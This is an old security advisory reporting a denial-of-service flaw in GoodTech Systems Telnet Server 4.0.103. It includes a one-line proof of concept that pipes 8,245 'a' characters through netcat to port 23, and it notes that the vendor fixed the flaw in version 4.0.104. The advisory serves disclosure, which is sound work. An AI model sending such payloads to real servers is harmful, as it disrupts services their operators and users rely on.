Reported January 5, 2004 by Donato Ferrante.

 

 

VERSIONS AFFECTED

 

  • GoodTech Systems Telnet Server 4.0.103

 

DESCRIPTION

 

GoodTech Systems Telnet Server 4.0.103 contains a Denial of Service (DoS) vulnerability. By sending an overly long string as input to the vulnerable server, an attacker can cause the server to stop responding.

 
<b><span style="font-family:Verdana;
color:purple">DEMONSTRATION</h3></b>
 
<span style="font-family:
Verdana">The discoverer posted the following demonstration as proof of concept:</h3>

 

To test the vulnerability, simply send a long string to the Telnet server, perl -e 'print "a"x8245' | nc server 23

Alternatively, a string like :
aaaa\[..a..\]aa ( 8245 of a )

 

VENDOR RESPONSE

 

<span style="font-family:Verdana"><a href="http://www.goodtechsys.com/default.asp" style="color: blue; text-decoration: underline; text-underline: single">GoodTech Systems</a> has released version 4.0.104, which isn't vulnerable to this condition.</h3>

 

CREDIT

 

Discovered by Donato Ferrante.